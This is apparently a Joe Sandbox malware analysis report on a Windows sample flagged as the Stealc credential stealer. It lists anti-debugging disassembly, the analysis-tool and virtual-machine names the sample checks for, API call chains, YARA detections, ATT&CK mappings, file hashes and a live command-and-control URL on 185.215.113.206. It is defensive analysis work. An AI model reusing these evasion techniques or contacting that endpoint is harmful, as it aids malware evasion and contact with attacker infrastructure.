                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14886B3 second address: 14886D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E418h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F0F0527E41Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14886D9 second address: 14886DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148A239 second address: 148A23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148A23D second address: 148A24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F0F04CBD316h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148D0BB second address: 148D13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0F0527E419h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F0F0527E408h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dl, 1Eh 0x0000002a push dword ptr [ebp+122D2F62h] 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F0F0527E408h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a add dword ptr [ebp+122D2A70h], ecx 0x00000050 push F774DC86h 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 jmp 00007F0F0527E40Ah 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148D13A second address: 148D13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E912 second address: 148E945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E411h 0x00000007 jmp 00007F0F0527E413h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F0F0527E432h 0x00000014 push esi 0x00000015 push esi 0x00000016 pop esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E945 second address: 148E94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 148E94D second address: 148E953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14903C5 second address: 14903CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF0516 second address: 5AF051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF051A second address: 5AF051E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF051E second address: 5AF0524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF0524 second address: 5AF0536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0F04CBD31Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF0536 second address: 5AF0551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ah, E9h 0x0000000c mov al, dh 0x0000000e popad 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 movsx edx, si 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF05E6 second address: 5AF05FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF05FB second address: 5AF0622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0F0527E410h 0x0000000a sbb ax, CAE8h 0x0000000f jmp 00007F0F0527E40Bh 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF0622 second address: 5AF06AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F04CBD325h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f call 00007F0F04CBD31Ch 0x00000014 pushfd 0x00000015 jmp 00007F0F04CBD322h 0x0000001a sub ah, FFFFFFA8h 0x0000001d jmp 00007F0F04CBD31Bh 0x00000022 popfd 0x00000023 pop eax 0x00000024 pushfd 0x00000025 jmp 00007F0F04CBD329h 0x0000002a and eax, 4A634BC6h 0x00000030 jmp 00007F0F04CBD321h 0x00000035 popfd 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF06AB second address: 5AF06AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AF06AF second address: 5AF06C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B042E second address: 13B0438 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11FDADF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11FDB9B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 13B7DEF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 142BACD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37390
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F240F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F240F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F1E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F247C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F247C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F1F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F11710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F1DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F24B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F24B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F23B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F23B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F1BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F1EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F1DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F1DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F11160 GetSystemInfo,ExitProcess,0_2_00F11160
                Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1731587725.0000000001DB2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1731587725.0000000001DE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware2,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36206
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36203
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36224
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36217
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36090
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36257
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F14610 VirtualProtect ?,00000004,00000100,000000000_2_00F14610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F29BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F29BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F29AA0 mov eax, dword ptr fs:[00000030h]0_2_00F29AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F27690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00F27690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F29790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00F29790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F298E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00F298E0
                Source: file.exe, file.exe, 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F575A8 cpuid 0_2_00F575A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00F27D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F26BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00F26BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F279E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00F279E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F27BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00F27BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.f10000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1690239015.0000000005960000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4460, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.phpafile.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php/bfile.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/wKLfile.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.1731587725.0000000001D6E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.206/6c4adf523b719729.phpZfile.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/wsfile.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://185.215.113.206/6c4adf523b719729.php%file.exe, 00000000.00000002.1731587725.0000000001DC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://185.215.113.206/wfile.exe, 00000000.00000002.1731587725.0000000001DD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.1690239015.000000000598B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    185.215.113.206
                                    		unknownPortugal
                                    		206894WHOLESALECONNECTIONSNLtrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1544998
                                    Start date and time:2024-10-30 00:19:06 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 3m 9s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:1
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:file.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@1/0@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 80%
                                    • Number of executed functions: 20
                                    • Number of non-executed functions: 127
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated

                                    Warnings

                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • VT rate limit hit for: file.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206/6c4adf523b719729.php
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206/6c4adf523b719729.php

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                    • 185.215.113.16
                                    file.exeGet hashmaliciousStealcBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 185.215.113.206
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 185.215.113.16

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.956685175501958
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:file.exe
                                    File size:2'133'504 bytes
                                    MD5:b2d5f7c5a51b55bfe094dbe2a60da2e3
                                    SHA1:ace802a1a1b603e5361c2f3a2b4b5361b3358186
                                    SHA256:a117df022325ff641b44e0d81f794e83d259764a0c82e52edb471a89b3f75370
                                    SHA512:c57ea51400c2fb4ab89124160c6321bb597534777c873809ba677b6391d11fabf868889088c742159b148b987d500b3f8d76c8b9a9e604b272d6504c5918f580
                                    SSDEEP:49152:DfcqjHOH/2vzt7Z7LAGil2KwMFsHD9LKOsFOorhpzMsT:Dfcq7OHevzs2LKOs/rh2sT
                                    TLSH:94A5332C5FC02D6CDCC1DCBB037FD2285E913505C99B939018F519AC9E5AEEFA289D4A
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

